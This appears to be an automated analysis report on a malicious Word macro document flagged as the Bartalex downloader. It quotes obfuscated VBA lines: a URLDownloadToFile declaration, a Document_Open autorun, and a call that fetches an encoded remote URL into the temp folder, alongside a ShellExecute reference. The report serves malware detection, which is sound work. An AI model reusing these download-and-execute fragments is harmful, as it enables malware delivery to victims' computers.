Malicious Office (OLE) — malware analysis report

Heuristics 8

• ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
• Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
  Reference to URLDownloadToFile API
• VBA macros detected medium 3 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
  URLDownloadToFile in VBA
  Matched line in script

  Private Declare PtrSafe Function ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ûÑÛïÇÉéÉÏèËÊçíâóÉûÉçÔùïíéÎÇÀÎÜëÏÀËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôó As Long, ByVal ûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéá As String, ByVal ÛâéÜÂíËïÜÔûÑÛïÇÉ …

• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Private Sub Document_Open()

• Environ() call (env variable access) low OLE_VBA_ENVIRON
  Environ() call (env variable access)
  Matched line in script

  ÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛîËËÛàëáôüèóÑïÂîüññíúÊÀÊéÏûáíóÏéáïÔÉáâÉéÜèúúËôúïÉóÂñÈËâúóáàÔÀúôÀùÊÎÑôùÉíÎêÈüîÎÈïÑâçâèüíüÇéáÛâéÜÂíËïÜÔ 0, ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/nmn0fwjidsb.qx0ufo/fojhoffnpdojufosfuoj00;quui"), Environ("temp") & ËàÜÈÊèÊÏúÎëÀÀûÇÑàêñÛÛôûÂïñàÑËîïéîùËÉêÇÜÜÇÏÉÂóÀüêéëÂôÏùñÇáñéÑîÊáéÉùîúüÈÎÔéÑÉÂÇÂÉëûÈúùôÎÂÈôóûÜÑÊùíÊûÏüÉÈîîóÜêíçéêÉñÉÇûéÏçñÔçÛ("fyf/uofjmDUpX"), 0, 0

• Reference to ShellExecute API high SC_STR_SHELLEXEC
  Reference to ShellExecute API
• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://www.w3.org/1999/02/22-rdf-syntax-ns# Referenced by macro

  • http://ns.adobe.com/tiff/1.0/Referenced by macro
  • http://ns.adobe.com/exif/1.0/Referenced by macro
  • http://purl.org/dc/elements/1.1/Referenced by macro
  • http://ns.adobe.com/xap/1.0/Referenced by macro
  • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.